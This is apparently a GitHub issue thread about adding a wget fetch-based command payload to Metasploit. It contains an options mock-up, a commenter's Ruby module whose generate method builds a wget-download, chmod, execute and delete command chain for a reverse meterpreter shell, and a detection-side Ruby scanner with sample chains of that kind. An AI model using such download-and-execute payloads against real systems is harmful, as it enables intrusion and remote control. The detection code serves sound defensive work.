
Wget Fetch-based command payload

Open bwatters-r7 opened this issue 2 years ago • 3 comments

Use the groundwork from the adapter payloads to create a new type of payload that uses wget to pull a payload down and execute it. Fundamentally, this would be the same as single-command command stagers, but significantly simpler to implement and far more portable. This (in theory) will be the first "Fetch-Based" payload implemented, with more to follow.

General usage mock-up:

msf6 exploit(linux/http/glpi_htmlawed_php_injection) > use payload/cmd/linux/x64/wget/meterpreter/reverse_tcp 
msf6 payload(cmd/linux/x64/wget/meterpreter/reverse_tcp) > show options

Module options (payload/cmd/linux/x64/wget/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_DELETE        true             yes       Attempt to delete payload after execution
   FETCH_FILENAME      nRqYjpTCY        no        Name to use on remote system when storing payload
   FETCH_SRVHOST       0.0.0.0          yes       Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URI           ZAhCbCtg         no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port
   WGET_CHECK_CERT     false            yes       Do not check the server certificate
   WGET_PROTOCOL       HTTP             yes       Protocol to use for fetch command (Accepted: HTTP, HTTPS)
   WGET_SILENT         true             yes       Set silent flag in wget command


View the full module info with the info, or info -d command.

msf6 payload(cmd/linux/x64/wget/meterpreter/reverse_tcp) > 

bwatters-r7 avatar Mar 09 '23 13:03 bwatters-r7

To create a new type of payload that uses wget to pull a payload down and execute it, you can use the groundwork from the adapter payloads. Here's an example of how you could create a fetch-based command payload using wget:

Start by creating a new file in the "payloads/cmd" directory with a descriptive name, such as "linux_x64_wget_meterpreter_reverse_tcp.rb".

In the new file, define your payload class and inherit from the "Msf::Payload::Single" class. For example:

class MetasploitModule < Msf::Payload::Single
  ...
end

Define any required options for your payload using the "register_options" method. These options will be used to configure the wget command that fetches the payload. For example:

register_options(
  [
    OptString.new('FETCH_SRVHOST', [true, 'Local IP to use for serving payload', '0.0.0.0']),
    OptInt.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]),
    OptString.new('FETCH_WRITABLE_DIR', [true, 'Remote writable dir to store payload', '/tmp']),
    OptString.new('FETCH_FILENAME', [false, 'Name to use on remote system when storing payload', nil]),
    OptString.new('FETCH_URI', [false, 'Local URI to use for serving payload', nil]),
    OptBool.new('FETCH_DELETE', [true, 'Attempt to delete payload after execution', true]),
    OptBool.new('WGET_CHECK_CERT', [true, 'Do not check the server certificate', false]),
    OptEnum.new('WGET_PROTOCOL', [true, 'Protocol to use for fetch command', 'HTTP', ['HTTP', 'HTTPS']]),
    OptBool.new('WGET_SILENT', [true, 'Set silent flag in wget command', true])
  ]
)

Implement the "generate" method to generate the payload. In this method, you'll use the "wget" command to fetch the payload from the specified server and store it in a writable directory on the target system. You can use the "datastore" method to access the values of the options you defined in step 3. Here's an example implementation:

def generate(_opts = {})
  dir = datastore['FETCH_WRITABLE_DIR']
  # Resolve the filename and URI once so every step of the chain refers to the same path
  fname = datastore['FETCH_FILENAME'] || Rex::Text.rand_text_alpha(8)
  uri = datastore['FETCH_URI'] || Rex::Text.rand_text_alpha(8)
  path = "#{dir}/#{fname}"

  # Fetch the served payload into the remote writable directory
  cmd = "wget -O #{path}"
  cmd << " --no-check-certificate" if datastore['WGET_CHECK_CERT']
  cmd << " --quiet" if datastore['WGET_SILENT']
  cmd << " #{datastore['WGET_PROTOCOL'].downcase}://#{datastore['FETCH_SRVHOST']}:#{datastore['FETCH_SRVPORT']}/#{uri}"
  # Make it executable, run it, and optionally remove it afterwards
  cmd << " && chmod +x #{path}"
  cmd << " && #{path}"
  cmd << " && rm -f #{path}" if datastore['FETCH_DELETE']

  # A command payload returns the shell command itself
  cmd
end

This implementation generates a command that uses wget to fetch the payload from the specified server and store it in the remote writable directory. It then sets the execute permission on the file and executes it. Finally, it deletes the file if the "FETCH_DELETE" option is set.

Save the file and reload Metasploit to make your new payload available. You can now use your new fetch-based

saurabhmj11 avatar Apr 07 '23 05:04 saurabhmj11
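Seen from the detection side, the fetch, chmod +x, execute, rm chain that the issue's mock-up and the generate method in the comment above describe is a recognisable shape in process-audit data. The following Ruby is an added example, not code from the issue or from Metasploit; it recognises that chain (and the equivalent curl form, which goes beyond the wget case in the text) and reports the settings it implies. The sample command lines, hosts and the analyze_fetch_chain/scan names are constructed for the example.

```ruby
# Added example (not from the issue or from Metasploit): recognises the
# fetch -> chmod +x -> execute (-> rm) command chain that a wget/curl
# fetch-based payload produces, so it can be flagged in process-audit logs.

# Returns a hash describing the chain, or nil if the command line is not one.
def analyze_fetch_chain(cmdline)
  steps = cmdline.split(/\s*(?:&&|;|\|\|)\s*/)
  fetch = steps.find { |s| s =~ %r{\A(?:\S*/)?(?:wget|curl)\b} }
  return nil unless fetch

  # Output file: "wget -O <path>" or "curl -o <path>"
  m = fetch.match(/\s-[Oo]\s*(\S+)/)
  return nil unless m
  path = m[1]
  esc = Regexp.escape(path)

  chmod = steps.any? { |s| s =~ /\Achmod\s+\+x\s+#{esc}\b/ }
  run   = steps.any? { |s| s == path || s.start_with?("#{path} ") }
  rm    = steps.any? { |s| s =~ /\Arm\s+(?:-f\s+)?#{esc}\b/ }
  # Fetch followed by chmod and execution of the same file is the signature
  return nil unless chmod && run

  {
    tool: File.basename(fetch.split.first),
    url: fetch[%r{https?://\S+}],
    path: path,
    writable_dir: File.dirname(path),
    self_delete: rm,
    no_cert_check: !!(fetch =~ /--no-check-certificate\b|\s-k\b|--insecure\b/),
    quiet: !!(fetch =~ /--quiet\b|\s-q\b|\s-s\b|--silent\b/)
  }
end

# Constructed sample command lines (hosts are documentation addresses).
SAMPLE_CMDLINES = [
  # The chain the payload above would generate, using the mock-up's names
  'wget -O /tmp/nRqYjpTCY --quiet http://192.0.2.10:8080/ZAhCbCtg && chmod +x /tmp/nRqYjpTCY && /tmp/nRqYjpTCY && rm -f /tmp/nRqYjpTCY',
  # Benign download: the fetched file is never made executable or run
  'wget -O /tmp/pkg.tar.gz https://mirror.example.org/pkg.tar.gz && tar xzf /tmp/pkg.tar.gz',
  # curl variant with certificate checking disabled and no self-delete
  '/usr/bin/curl -k -o /dev/shm/x https://198.51.100.5/x && chmod +x /dev/shm/x && /dev/shm/x'
].freeze

# Returns the analyses of every command line that looks like a fetch-based payload
def scan(cmdlines)
  cmdlines.filter_map { |c| analyze_fetch_chain(c) }
end
```

The `self_delete` flag matters for response: when it is set, the dropped file is gone by the time an analyst looks, so the served URL and the writable directory are the artifacts worth preserving.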

Please see https://github.com/rapid7/metasploit-framework/pull/17782

bwatters-r7 avatar Apr 07 '23 14:04 bwatters-r7

Image

How can I fix it?

RahulTarafder avatar Mar 20 '24 06:03 RahulTarafder

Completed in https://github.com/rapid7/metasploit-framework/pull/17782

bwatters-r7 avatar Apr 03 '25 13:04 bwatters-r7